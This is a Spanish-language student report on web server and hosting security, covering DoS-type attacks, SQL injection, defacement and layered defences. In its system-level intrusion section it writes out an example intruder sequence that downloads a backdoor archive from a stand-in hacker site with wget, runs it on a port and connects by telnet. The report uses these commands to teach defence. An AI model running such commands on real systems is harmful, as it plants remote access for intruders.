seguridad en servidores web y hosting
TRANSCRIPT
-
8/9/2019 Seguridad en servidores web y hosting
1/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 1 de 30
TCP IP / Profesor Juan Olivares
SEGURIDAD EN
SERVIDORES WEB Y
HOSTING
Alumnos:
Heine Vargas
Pablo Carmona
Luis Sanhueza
Christian Cuevas
Carrera:
Gestin y Soporte de Redes 3 Semestre.
-
8/9/2019 Seguridad en servidores web y hosting
2/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 2 de 30
Introduccin
En los ltimos aos la evolucin, y la posterior innovacin de la tecnologa ha generado grandes
avances en todos los mbitos. Las comunicaciones han sido las de mayor desarrollo, especialmente
el desarrollo de Internet.
Internet est presente en nuestras vidas y en nuestras costumbres, en la forma de buscar
informacin, de entretenernos, de comunicarnos y por supuesto, ha hecho que aparezcan nuevas
formas de comprar y vender bienes.
Desde el comunicarse por Messenger o comunicarse va Skype, hasta el revisar la cuenta
corriente bancaria mediante Internet, el uso de la red ha ido ocupando un lugar en la vida de cada
persona.
Estos cambios conllevan grandes beneficios no slo para las personas, tambin para las
empresas que han encontrado grandes oportunidades en los desarrollos de las comunicaciones.
Estas tecnologas estn al alcance tanto de las grandes empresas como de las pequeas. Cualquiera
de estos avances puede estar al alcance de otras empresas o potenciales clientes dispersos
alrededor del mundo.
De esta manera, se han desarrollado un gran nmero de operaciones comerciales novedosas.
Pero as como crecen los beneficios, esta nueva realidad presenta un desafo para las autoridades
fiscales, ya que no es tarea fcil crear un sistema legal-impositivo adecuado a los nuevos tipos de
comercio.
Y como sucede en Chile y el resto del planeta, a medida de que las medidas de seguridad se
van optimizando, la delincuencia va sofisticando cada vez ms sus mtodos de intrusin e infiltracin
en los sistemas.
Lo cual, requiere de una retroalimentacin constante, mantenerse informado, y de este modo,
estar preparado ante un inminente ataque.
El comercio electrnico va creciendo cada da, ya que es una forma cmoda y rpida de adquirir
lo que necesitemos sin movernos de nuestra casa.
-
8/9/2019 Seguridad en servidores web y hosting
3/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 3 de 30
Objetivos
El objetivo general que tiene el presente trabajo es el presentar un trabajo bien constituido
sobre la seguridad en servidores y alojamiento Web, explicando una serie de conceptos
relacionados al tema, comenzando por definir los dispositivos en los cuales se est enfocando
el concepto, las vulnerabilidades y medidas, en lo que respecta a la seguridad.
Los objetivos especficos del presente trabajo son:
1.- Que el trabajo permita identificar las vulnerabilidades comunes en los que respecta a la
seguridad de servidores Web y hosting.
2.- Presentar ante la autoridad evaluadora un trabajo bien constituido, el cual se encuentre bien
distribuido, con un esquema ordenado.
3.- Que los alumnos realizadores del trabajo aprendan los conceptos tratados, y stos puedan
ser aplicados en el ramo de protocolos TCP-IP.
-
8/9/2019 Seguridad en servidores web y hosting
4/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 4 de 30
Servidor Web
Qu es un servidor Web?
Bsicamente, un servidor Web sirve contenido esttico a un navegador, carga un archivo y lo sirve a
travs de la red al navegador de un usuario. Este intercambio es mediado por el navegador y el
servidor que hablan el uno con el otro mediante HTTP.
Se pueden utilizar varias tecnologas en el servidor para aumentar su potencia ms all de su
capacidad de entregar pginas HTML; stas incluyen scripts CGI, seguridad SSL y pginas activas
del servidor (ASP).
Los Servidores almacenan informacin en forma de pginas Web y a travs del
Protocolo HTTP lo entregan a peticin de los clientes (navegadores Web) en formato HTML.
Servidor Web
-
8/9/2019 Seguridad en servidores web y hosting
5/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 5 de 30
Funcionamiento
El Servidor Web se ejecuta en un ordenador mantenindose a la espera de peticiones por parte de un
cliente (un navegador Web) y que responde a estas peticiones adecuadamente, mediante una pgina
Webque se exhibir en el navegador o mostrando el respectivo mensaje si se detect algn error. A
modo de ejemplo, al teclear www.wikipedia.org (http://www.wikipedia.org) en nuestro navegador, ste
realiza una peticin HTTP al servidor de dicha direccin. El servidor responde al cliente enviando el
cdigo HTML de la pgina; el cliente, una vez recibido el cdigo, lo interpreta y lo exhibe en pantalla.
Funcionamiento de un servidor Web
Como vemos con este ejemplo, el cliente es el encargado de interpretar el cdigo HTML, es decir, de
mostrar las fuentes, los colores y la disposicin de los textos y objetos de la pgina; el servidor tanslo se limita a transferir el cdigo de la pgina sin llevar a cabo ninguna interpretacin de la misma.
Adems de la transferencia de cdigo HTML, los Servidores Web pueden entregar aplicaciones Web.
stas son porciones de cdigo que se ejecutan cuando se realizan ciertas peticiones o respuestas
HTTP. Hay que distinguir
entre:
Aplicaciones en el lado del cliente: el cliente Web es el encargado de ejecutarlas en la mquina delusuario.
Son las aplicaciones tipo Java "applets" o Javascript: el servidor proporciona el cdigo de las
aplicaciones al cliente y ste, mediante el navegador, las ejecuta. Es necesario, por tanto, que el
cliente disponga de un navegador con capacidad para ejecutar aplicaciones (tambin llamadas
-
8/9/2019 Seguridad en servidores web y hosting
6/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 6 de 30
scripts). Comnmente, los navegadores permiten ejecutar aplicaciones escritas en lenguajejavascript
yjava, aunque pueden aadirse ms lenguajes mediante el uso de plugins.
Aplicaciones en el lado del servidor: el servidor Web ejecuta la aplicacin; sta, una vez ejecutada,
genera cierto cdigo HTML; el servidor toma este cdigo recin creado y lo enva al cliente por medio
del protocolo HTTP.
Las aplicaciones de servidor muchas veces suelen ser la mejor opcin para realizar aplicaciones Web.
La razn es
que, al ejecutarse sta en el servidor y no en la mquina del cliente, ste no necesita ninguna
capacidad aadida, como s ocurre en el caso de querer ejecutar aplicaciones javascript o java. As
pues, cualquier cliente dotado de un navegador Web bsico puede utilizar este tipo de aplicaciones.
El hecho de que HTTP y HTML estn ntimamente ligados no debe dar lugar a confundir ambos
trminos. HTML es un lenguaje de marcas y HTTP es un protocolo.
Servidor Web Local
Protocolo Cliente-Servidor.-
Instalar un servidor Web en nuestro PC nos permitir, entre otras cosas, poder montar nuestra propia
pgina Web sin necesidad de contratar hosting, probar nuestros desarrollos va local, acceder a los
archivos de nuestro equipo desde un PC remoto (aunque para esto existen otras opciones, como
utilizar un servidor FTP) o utilizar alguno de los programas basados en Web tan interesantes que
estn viendo la luz ltimamente. El problema de usar nuestro
ordenador como servidor Web es que conviene tenerlo encendido permanentemente (para que est
accesible de forma continua como la mayora de los sitios webs), con el consiguiente coste debido al
consumo de electricidad
(Conviene tener en cuenta que hay alojamientos Web gratuitos, incluso sin publicidad y con
interesantes funciones).
Software
Algunos servidores Web importantes son:
Apache, IIS, Cherokee
Otros servidores, ms simples pero ms rpidos, son:
Lighttpd y thttpd
-
8/9/2019 Seguridad en servidores web y hosting
7/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 7 de 30
Web Hosting
Qu es Web Hosting?
Web Hosting es la renta de espacio en un servidor de Internet para colocar pginas Web. De
esta manera no hay que preocuparse por comprar un servidor que tiene que estar conectado 24 horas
al da, configurarlo, contratar personal especializado, etc.
Imagen relativa al alojamiento Web.-
Un servicio de Web hosting, es el que presta una empresa que provee espacio paraalojamiento de pginas Web. Las empresas de alojamiento (hosting) tienen sistemas que actan
como servidores Web (hosts) o han comprado espacio en un servidor de una tercera empresa. Las
empresas de hosting venden espacio a sus clientes en su servidor, los cuales luego, alojan los
archivos, grficos y otros relativos a sus pginas Web, desde donde pueden ser vistos en la World
Wide Web. Los servidores de las empresas host estn conectadas al WWW las 24 horas del da todo
el ao, para que cualquiera pueda tener acceso a una determinada pgina Web, en cualquier
momento con solo ingresar su direccin URL.
La mayora de empresas host, ofrecen el servicio de alojamiento a sus clientes por una tarifa
mensual, trimestral o anual. Los servicios de hosting bsicos pueden variar en lo que ofrecen, pero la
mayora ofrecen ms o menos lo mismo, con programas para principiantes a tarifas muy bajas. Los
servicios de hosting pueden costar ms debido a que se contrata mayor espacio de alojamiento,
cuentas adicionales de correo, y otros servicios ms complejos, como carritos de compra en lnea y
comercio electrnico.
-
8/9/2019 Seguridad en servidores web y hosting
8/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 8 de 30
Servidor seguro en el comercio electrnico en un website
Con un servidor seguro la informacin transmitida entre su website y el visitante es codificada,
de manera que si alguien logra interceptar la transmisin le ser muy difcil descifrar los nmeros de
tarjeta de crdito y dems datos, por lo que no podra utilizarlos contra la empresa y sus clientes,
generando la confianza necesaria para que compren.
Certificado de un servidor seguro
Con un certificado los visitantes de la website estarn seguros de que estn conectados a su
website de manera segura porque con el certificado todos los datos enviados entre el visitante y su
website son codificados.
Firma digital
La firma digital hace referencia, en la transmisin de mensajes telemticos y en la gestin
de documentos electrnicos, a un mtodo criptogrfico que asocia la identidadde una persona o de
un equipo informtico al mensaje o documento. En funcin del tipo de firma, puede, adems, asegurar
la integridaddel documento o mensaje.
La firma electrnica, como la firma holgrafa (autgrafa, manuscrita), puede vincularse a un
documento para identificar al autor, para sealar conformidad (o disconformidad) con el contenido,
para indicar que se ha ledo y, en su defecto mostrar el tipo de firma y garantizar que no se pueda
modificar su contenido.
HTTP y HTTPS, representados con sus respectivas pilas de protocolos.
-
8/9/2019 Seguridad en servidores web y hosting
9/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 9 de 30
Formato de la firma electrnica
Regulaciones en diferentes pases
El marco comn de firma electrnica de la Unin Europea
El mercado interior de la Unin Europea implica un espacio sin fronteras interiores en el que est
garantizada la libre circulacin de mercancas. Deben satisfacerse los requisitos esenciales
especficos de los productos de firma electrnica a fin de garantizar la libre circulacin en el mercado
interior y fomentar la confianza en la firma electrnica.
En ese sentido la Directiva 1999/93/CE sienta un marco comn para la firma electrnica que se
concret con la transposicin de la Directiva a las diferentes legislaciones nacionales de los pases
miembros.
Ley sobre firma electrnica en Chile
Esta ley fue publicada el 15 de septiembre del ao 2003 por el Ministerio Secretara General de la
Presidencia, la Ley 19.799 sobre Documentos Electrnicos, Firma Electrnica y Servicios de
Certificacin de dicha firma, reconoce que los rganos del Estado podrn ejecutar o realizar actos,
celebrar contratos y expedir cualquier documento, dentro de su mbito de competencia,suscribindolos por medio de firma electrnica simple. Igualmente seala que estos actos, contratos y
documentos, suscritos mediante firma electrnica, sern vlidos de la misma manera y producirn los
mismos efectos que los expedidos en soporte de papel.
-
8/9/2019 Seguridad en servidores web y hosting
10/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 10 de 30
Ataques al servidor Web
Vulnerabilidad de los servicios en la Web
Los primeros ataques a la red aprovecharon las vulnerabilidades relacionadas con la implementacin
de conjuntos de protocolos TCP/IP. Al corregirlas gradualmente, los ataques se dirigieron a las capas
de aplicaciones y a la Web en particular, ya que la mayora de las empresas abrieron sus sistemas de
firewall al trfico en Internet.
El protocolo HTTP (o HTTPS) representa el estndar que posibilita la transferencia de pginas Web a
travs de un sistema de solicitud y respuesta.
Internet, que se utiliza principalmente para transferir pginas Web estticas, se ha convertido
rpidamente en una herramienta interactiva que permite proporcionar servicios en l nea. El trmino
"aplicacin Web" se refiere a cualquier aplicacin a cuya interfaz se pueda acceder en la Web desde
un simple navegador. Hoy en da, el protocolo HTTP, la base para una determinada cantidad de
tecnologas (SOAP, Javascript, XML-RPC, etc.), juega un indudable papel estratgico en la seguridad
de sistemas de informacin.
Debido a que los servidores Web estn cada vez ms protegidos, los ataques estn dirigiendo su
atencin al aprovechamiento de las fallas de las aplicaciones Web.
Como tal, la seguridad de los servicios de Internet debe tenerse en cuenta al momento del diseo y
desarrollo.
Algunas vulnerabilidades ilustradas durante el trfico cliente-servidor
-
8/9/2019 Seguridad en servidores web y hosting
11/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 11 de 30
Tipos de vulnerabilidades
Las vulnerabilidades de aplicaciones Web se pueden clasificar de la siguiente manera:
Vulnerabilidades del servidor Web. Este tipo es cada vez ms atpico ya que la mayora de los
Desarrolladores de servidores Web han aumentado su seguridad con los aos;
Manipulacin de URL, incluida la modificacin manual de parmetros de URL para modificar elcomportamiento esperado del servidor Web;
Aprovechamiento de las debilidades de los identificadores de sesin y sistemas de autenticacin;
Inyeccin de cdigo HTML y Secuencia de comandos entre sitios;
Inyeccin de comandos SQL.
La verificacin necesaria de los datos de entrada
El protocolo HTTP se utiliza por naturaleza para administrar las solicitudes, es decir, para recibir los
datos de
entrada y enviar los datos de retorno. Los datos se pueden enviar de varias maneras:La URL de la pgina Web
En encabezados HTTP
En el cuerpo de la solicitud (solicitud POST)
A travs de una cookie
En general, la idea bsica a tener en cuenta durante el proceso de desarrollo es que nunca se debe
confiar en los datos enviados por el cliente.
Casi todas las vulnerabilidades de los servicios Web estn vinculadas a la negligencia por parte de los
diseadores, quienes no han verificado el formato de los datos ingresados por los usuarios.
-
8/9/2019 Seguridad en servidores web y hosting
12/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 12 de 30
Impacto de los ataques en la Web
Los ataques a las aplicaciones Web siempre son dainos ya que proporcionan una mala imagen a la
empresa.
Un ataque exitoso puede provocar cualquiera de las siguientes consecuencias:
Desfiguracin de la pgina Web;
Robo de informacin;
Modificacin de datos, y en particular la modificacin de datos personales de los usuarios;Intrusin en el servidor Web.
-
8/9/2019 Seguridad en servidores web y hosting
13/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 13 de 30
Amenazas contra los servidores Web
Obtencin usuario y clave con diccionarios o fuerza bruta (http://www.hoobie.net/brutus/)
Hoy da, hay un enorme nmero de amenazas a las que hace frente a un servidor Web, muchas de
ellas dependen del uso, el sistema operativo y el ambiente que se haya configurado en el sistema
mismo. Estos son algunos de los ataques ms genricos que su "pobre" servidor puede enfrentar.
Negacin del servicio
Un ataque por negacin del servicio (DOS) es uno de los ataques de la vieja escuela
que el servidor puede enfrentar. El ataque es muy simple, y hoy en da es realizado por aquellos
individuos conocidos comnmente como script kiddies, con un perfil de habilidades tcnicas bajo. En
resumen, un ataque DOS es un ataque en el cual un sistema ataca otro con la intencin de consumir
todos los recursos del sistema (tales como ancho de banda o ciclos del procesador), no dejando nada
libre para peticiones legtimas. Generalmente, estos ataques se han relegado a la categora de
molestias, pero no por ello hay razn para bajar la guardia ante ellos, aunque hay un montn de cosas
ms para mantenerse despierto.
Negacin del servicio distribuida
El ataque por negacin del servicio distribuido (DDoS) es el hermano mayor del ataque DOS y como
tal es ms malo y ms sucio. La meta del ataque DDoS es hacer la misma cosa que el DOS, pero a
una escala mucho ms grande y compleja. En un ataque de DDoS, en vez de un sistema ataque a
-
8/9/2019 Seguridad en servidores web y hosting
14/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 14 de 30
otro, un atacante utiliza sistemas mltiples para apuntar un servidor (su servidor), y sistemas mltiples
significa (en algunos casos) no centenares o millares, sino hasta cientos de millares. Donde el ataque
DOS es tan solo una molestia, un ataque de DDoS puede ser mortal, ya que puede llevar a un
servidor fuera de lnea rpidamente. La buena noticia es que el nivel de habilidad requerido para
contrarrestar un ataque DDoS apagado no es tan
alto.
Algunos de los ataques ms comunes de DDoS incluyen:
Ataques FTP. Un ataque FTP (File Transfer Protocol) se decreta cuando un atacante carga en un
servidor ftp un archivo construido especialmente para hacerlo vulnerable, el efecto es que
alternadamente lo remite a otra localizacin, que es generalmente otro servidor ftp dentro de la
organizacin.
El archivo enviado tpicamente contiene una cierta clase de carga diseada para hacer que el servidor
final haga lo que el atacante desea.
Simulacin ataque Dos Ftp
Ataque de exploracin de puertos. Un ataque de exploracin de puertos se realiza a travs
la exploracin estructurada y sistemtica de un Host. Por ejemplo, alguien puede explorar su servidor
Web con la intencin de encontrar servicios expuestos u otras vulnerabilidades que puedan ser
explotadas. Este ataque puede ser realizado de una manera fcil con cualquier nmero de programas
exploradores de puertos disponibles gratuitamente en Internet.
Tambin es uno de los tipos de ataque ms comunes, pues es tan simple que los pequeos hackers
(script kiddies) los realizan apenas consiguen el nombre de un Host o la direccin IP de un servidor
(sin embargo, tpicamente ellos no saben interpretar los resultados). Tenga esto presente, pues un
atacante con ms habilidades utilizar la exploracin de puertos para descubrir informacin que usar
en un esfuerzo posterior.
Ataque de exploracin de puertos
-
8/9/2019 Seguridad en servidores web y hosting
15/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 15 de 30
Ataque de inundacin por ping (Pingflood). Es un ataque simple DDoS en cul una
computadora enva un paquete (ping) a otro sistema con la intencin de descubrir informacin sobre
servicios o sistemas de arriba a abajo. En el extremo inferior, una inundacin por Ping se puede
utilizar para descubrir informacin encubierta, pero en la parte alta los paquetes que son
enviados a una blanco o vctima pueden provocar que el sistema quede fuera de lnea o sufra
retardos. Este es un ataque a la vieja escuela, pero es an muy eficaz, ya que cierto nmero de
sistemas operativos modernos siguen siendo susceptibles a este.
ataque de inundacin por ping (PingFlood)
Ataque "Smurf". Este ataque es similar al ataque de inundacin por ping pero con una astuta
modificacin al proceso. En un ataque Smurf, el comando "ping" se enva a una red intermedia, donde
el efecto se amplifica y se remite a la vctima. As, lo que antes era una sola gota ahora se convierta
en un "tsunami" virtual de trfico. Afortunadamente, este tipo de ataques es raro.
Ataque Smurf
-
8/9/2019 Seguridad en servidores web y hosting
16/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 16 de 30
Ataque por inundacin SYN (Synflood). Este ataque requiere un cierto conocimiento del
protocolo TCP/IP -es decir como trabaja el proceso de comunicacin IP-. La manera ms fcil de
explicar este ataque es con una analoga. Este ataque es el equivalente en una red a enviar a alguien
una carta que requiere una respuesta, solamente que la carta utiliza un falso
remitente. As cuando el objetivo enva de vuelta la carta espera una respuesta, pero la respuesta
nunca llega porque de alguna manera entra en un hoyo negro en algn lugar. Suficientes peticiones
SYN al sistema y el atacante puede provocar que se util icen todas las conexiones disponibles en el
sistema, de modo que nada mas pueda fluir a travs de este.
Ataque por inundacin SYM (SynFlood)
Ataque de fragmentacin. En este caso, un atacante utiliza conocimientos avanzados del
protocolo del TCP/IP para romper los paquetes en pedazos o fragmentos ms pequeos, que
puentean la mayora de los sistemas de intrusin-deteccin. En casos extremos, este tipo de ataque
puede causar cadas, bloqueos, reboots, pantallas azules y otro tipo de travesuras.
Afortunadamente, este ataque es difcil de lograr.
uso de Fragmentacin
-
8/9/2019 Seguridad en servidores web y hosting
17/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 17 de 30
Ataque SNMP. Estos ataques se disean especficamente para explotar el servicio SNMP, el cual
maneja la red y los dispositivos en ella. Ya que el servicio SNMP se usa para manejar los dispositivos
de la red, al explotar este servicio se puede conseguir inteligencia detallada sobre la estructura de la
red que puede utilizarse ms adelante para otros ataques.
SNMP
Desconfiguracin de la pgina Web
La desconfiguracin de la pgina Web ocurre de vez en cuando. Como su nombre lo indica, este
ataque resulta de una desconfiguracin del sitio, cuando un servidor est incorrectamente
configurado, y un atacante utiliza esta debilidad para modificar pginas bajo cualquier cantidad de
razones, por ejemplo la diversin o promover una causa poltica.
Pagina Web desconfigurada.
-
8/9/2019 Seguridad en servidores web y hosting
18/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 18 de 30
Inyeccin SQL
Inyecciones SQL (lenguaje de consulta estructurada), son los ataques realizados contra bases de
datos. En este caso, un atacante utiliza debilidades en el diseo de la base de datos o de la pgina
Web para extraer informacin o ms an, para manipular informacin dentro de la base de datos.
Aunque no es posible en este caso ser ms especficos respecto a cmo quitar este tipo de ataque,
usted puede evitarlo si tiene conocimientos de SQL, los cuales debera tener -si est hospedando una
base de datos en su servidor Web-.
Inyeccin SQL
Codificacin pobre
Cualquier persona que ha sido desarrollador o ha trabajado en tecnologas de la informacin ha visto
los problemas asociados a prcticas descuidadas o perezosas en la codificacin. Una pobrecodificacin puede generar un gran nmero de factores, incluyendo un pobre entrenamiento, nuevos
desarrollos, o una escasa garanta de calidad para una aplicacin. En el mejor de los casos, una
codificacin pobre puede ser no mas que una molestia, donde las funcionalidades de una aplicacin
no trabajen segn lo anunciado; pero en el peor de los casos, las aplicaciones pobremente
codificadas pueden tener "agujeros" de seguridad importantes.
-
8/9/2019 Seguridad en servidores web y hosting
19/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 19 de 30
Programacin en PHP.
Cdigos empaquetado (Shrink-wrapped code)
Este problema se relaciona con los anteriores casos de codificacin pobre, pero con una diferencia:
Bsicamente, el problema proviene de la conveniencia de obtener componentes precompilados o
desarrollados de antemano, que se pueden utilizar como bloques para construir aplicaciones propias.
Su desventaja es que los componentes utilizados pueden no haber pasado un proceso de revisin de
su cdigo -tal como el que usted hara-, y su uso puede crear problemas potenciales.
Adicionalmente, no es extrao escuchar por parte de los desarrolladores que realmente "no saben
como analizar el cdigo y entender totalmente lo que est haciendo" como para saber poner en usocomponentes empaquetados. En al menos un caso puedo pensarlo. Estoy enterado de un revelador
caso en el que usando un bloque del cdigo empaquetado para proporcionar un mecanismo de
autentificacin - para una aplicacin que autentificaba usuarios reales-, tambin se enviaban
electrnicamente las mismas credenciales de manera secreta a una tercera persona.
-
8/9/2019 Seguridad en servidores web y hosting
20/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 20 de 30
Los dos niveles de ataques a servidores Web
Ataque a sitio de dominio.gov.ar 13/8/2004
Un mal da entramos a nuestro sitio Web, y en lugar de ver nuestra pgina de siempre nos
encontramos con otra portada: "defaced" o "este servidor ha sido hackeado". Una vez confirmado que
realmente es as (que no se trata de un desvo del dominio), debemos identificar en qu nivel ha sido
realizada la intrusin: nivel de aplicacin o nivel de sistema. En uno u otro nivel los riesgos son
distintos, y son distintas las medidas a tomar para corregir el problema.
Una foto del Che Guevara, el smbolo de la anarqua... la cara de un mono... Fido Dido... un paquete
de sopa instantnea... Sea cual fuere la nueva "presentacin" de nuestro sitio Web, lo primero que
debemos hacer (adems de tranquilizarnos frente al estado de shock que producen estas situaciones)
es verificar si el servidor realmente ha sido vulnerado, y que no se trate simplemente de un desvo de
DNS.
Voy a resumir el problema del DNS: el Domain Name System es el responsable de traducir los
nombres de los sitios a las direcciones IP de los servidores donde stos estn alojados. As cuando
escribimos "www.sitioweb.com" el DNS retorna la direccin IP del servidor (como ser
200.40.129.50). Ahora imaginemos que un servidor DNS (hay millones) ha sido engaado, y en lugar
de retornar la direccin IP correcta, nos devuelve la IP de otro server donde se aloja la pgina Web
que vemos en lugar de la nuestra.
-
8/9/2019 Seguridad en servidores web y hosting
21/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 21 de 30
A esto se le llama "DNS spoofing", y sus efectos normalmente son locales. Es decir: el fallo lo
experimentan slo las mquinas que se basan (resuelven) en el servidor DNS en cuestin (una
empresa, un ISP, una ciudad). Y el resto del mundo sigue viendo nuestro sitio Web original sin
problemas.
Bien, una vez descartado que se trate de DNS spoofing, y confirmado -IP mediante- que nuestro sitio
Web realmente ha sido modificado, estamos en hora de determinar si el ataque se realiz a nivel de
aplicacin o a nivel de sistema.
Nivel de Sistema
Es el nivel de acceso que representa ms riesgo. Es lo que todo intruso desea lograr en una mquina:
tener el control total de los recursos... aduearse
completamente de la mquina con los mismos privilegios que el propio administrador.
El acceso a nivel de sistema implica el acceso al mismo sistema operativo, en ltima instancia
mediante un terminal remoto.
Estos accesos se logran a travs de algn servicio mal configurado, o de aplicaciones vulnerables que
permitan la ejecucin de cdigo arbitrario en el server. Por ejemplo: si tenemos abierto un servicio
telnet, o un SSH vulnerable, estamos dando al atacante una terminal de acceso para que
simplemente comience a trabajar en su prximo paso que discutiremos en las prximas lneas: la
escalada de privilegios.
Otra posible entrada a un sistema es la explotacin de servicios vulnerables que permitan
desbordamientos de bfers (que nos permitan, an sin tener un terminal, ejecutar comandos en el
sistema operativo).
Consideremos el siguiente caso: un intruso sabe que mediante un sendmail mal configurado, o un
proFTPd u otro software, tiene la posibilidad de ejecutar comandos sobre la mquina... Y esos
comandos pueden ser:
1) wget http://www.sitiohacker.com/backdoor.tar.gz
2) tar -xvzpf ./backdoor.tar.gz
3) cd backdoor
4) ./backdoor -p 10040
En al paso (1) baja de internet un paquete comprimido conteniendo un software de intrusin
(backdoor.tar.gz en nuestro ejemplo). En el paso (2) descomprime el paquete en el directorio actual
(no importa cual sea). En el paso (3) se mueve al directorio que ha sido creado tras descomprimir las
herramientas. Y en el paso (4) ejecuta un comando que pone a funcionar el servicio "backdoor"
-
8/9/2019 Seguridad en servidores web y hosting
22/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 22 de 30
escuchando en el puerto TCP 10040. (slo se trata de un ejemplo: las direcciones y los nombres son
ficticios. En la prctica puede haber miles de posibilidades).
Hasta ahora el intruso ha ejecutado estos comandos sin retorno visual: no tiene una pantalla que le
permita ver los resultados de lo que est tecleando, ya que la vulnerabilidad le permite slo enviar los
comandos que llegan al sistema operativo mediante una va alternativa.
Pero ahora el intruso, cmodamente y desde su mquina, puede hacer lo siguiente:
telnet 172.16.100.21 10040
...donde la IP del servidor atacado es 172.16.100.21, y 10040 es el puerto donde el hacker puso a
funcionar su aplicacin "backdoor". Ahora s, el hacker tiene una terminal de acceso a nuestro
sistema. Casi con la comodidad de estar en su propia PC. Pero para tener el control total del servidor
an le hace falta realizar otro trabajo:
Escalada de privilegios En el ejemplo anterior describiendo la forma de realizar un acceso,
todos los comandos que se ejecutaron en el sistema (incluso la ejecucin del programa "backdoor", y
los comandos que a su vez se ejecuten a travs de ste) se harn con los privilegios y permisos que
tenga el programa a travs del cual se accedi al servidor. En caso de haber accedido por una brecha
de proFTPd, seremos el usuario "ftp", o "nobody":
usuarios menores, con privilegios recortados, incapaces de realizar grandes cambios en la
configuracin del servidor.
La "escalada de privilegios" tiene un nombre bien autoexplicativo: consiste en la realizacin de uno o
ms ataques a programas locales mal configurados, y a travs de los mismos ir logrando nuevos
privilegios, hasta tomar el lugar del superusuario root (o wheel en los BSD). Sobre este punto se
pueden escribir decenas de libros, pero su profundizacin est fuera de los objetivos de este artculo.
Quien se haya tomado el trabajo de acceder de esta forma a un servidor, difcilmente sea tan estpido
como para dedicarse a modificar las pginas Web poniendo "servidor hackeado". Por el contrario:
esta categora de intrusos permanece en silencio, tratan de permanecer inadvertidos durante todo el
tiempo posible para as poder sacar el mximo provecho posible de "su nuevo servidor". Tal vez slo
al final, como broche de oro, tome la iniciativa de cambiar la portada del sitio Web (cuando el servidor
no le sirva ms para sus objetivos, o si es descubierto y se da cuenta de que va a ser expulsado).
-
8/9/2019 Seguridad en servidores web y hosting
23/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 23 de 30
Nivel de Aplicacin
Los ataques a nivel de aplicacin son aquellos que se realizan explotando vulnerabilidades de
aplicaciones que permitan modificar los datos que la propia aplicacin manipula, pero sin la
posibilidad de ejecucin de comandos sobre el sistema operativo.
Ejemplos: la modificacin o borrado de contenidos en un sistema de gestin de portales, como
phpNuke o Mambo. O la manipulacin de una base de datos SQL mediante un acceso no autorizado
a un phpMyAdmin vulnerable.
En este tipo de ataques el intruso puede cambiar lo que desee en nuestro sitio Web, o en nuestras
bases de datos. Pero no se puede considerar que el servidor est comprometido, ni que el intruso
haya entrado efectivamente en el sistema.
Los ataques a nivel de aplicacin son los ms comunes y visibles (y los ms populares entre los
chicos traviesos aficionados a romper cosas). De modo que el servidor -a pesar de estos ataques-
permanece intacto. La seriedad y la gravedad de estos ataques depende de la importancia de la
aplicacin Web atacada: no es lo mismo un ataque de este tipo en una galera de fotos online, que en
una aplicacin de procesamiento de pagos y transferencias
financieras.
Consideraciones de seguridad en Servidores Web
Medidas Preventivas:Su objetivo es prevenir o dificultar la intrusin ejemplo: Firewalls
Firewall
-
8/9/2019 Seguridad en servidores web y hosting
24/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 24 de 30
Medidas Reactivas:Reaccionan ante la amenaza tomando contra medidas ejemplo:
Firewall de aplicaciones, Mod_security, Sistema de deteccin de ataques de fuerza bruta, etc.
Mod Security
Medidas de Deteccin:Ayudan a detectar si una intrusin a ocurrido o est en proceso.
Ejemplo: HIDS como Tripwire, chkrootkit
chkrootkit en linux
Medidas de Recuperacin:Ayudan a recuperar la operabilidad luego de una intrusin
Ejemplo: backups e imgenes de disco.
Al implementar un esquema de seguridad, se debe planear en lneas defensivas, cada lnea refuerza
la anterior, de modo que el fallo o la vulnerabilidad de una lnea no comprometa la
instalacin, piense como el enemigo, monitoree sus logs e investigue cualquier indicio sospechoso.
Backup
-
8/9/2019 Seguridad en servidores web y hosting
25/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 25 de 30
Un ejemplo tpico de un esquema defensivo:
Primera lnea
Componente: Software
Objetivo: Mantener nuestro software al da y con sus respectivos parches de seguridad aplicados
Segunda lnea
Componente: Firewall
Objetivo: Reglamentar el trfico de entrada/salida
Ejemplos: APF, Firewalls de hardware, etc.
Un firewall clsico evita que accesos a determinados servicios de nuestro servidor pero no proteger
los servicios que obligatoriamente debemos dejar abiertos en un servidor Web como son: http, mail,
ssh, etc
Tercera lnea
Componente: Sistema de deteccin de ataques de fuerza bruta.
Objetivo: Proteger nuestros puntos de entrada al servidor, ssh, ftp, etc. que un firewall clsico
no protegera.
Ejemplos: BFD
Los hackers saben muy bien que muchos usuarios son descuidados con sus passwords, tambin
saben que muchsima gente usa su mismo login como password, adems existen numerosas
herramientas que facilitan el ataque a servicios como ftp y ssh, estos ataques tratan de ingresas miles
de combinaciones de usuarios y passwords, para tratar de dar con alguna que funcione.
Cuarta lnea
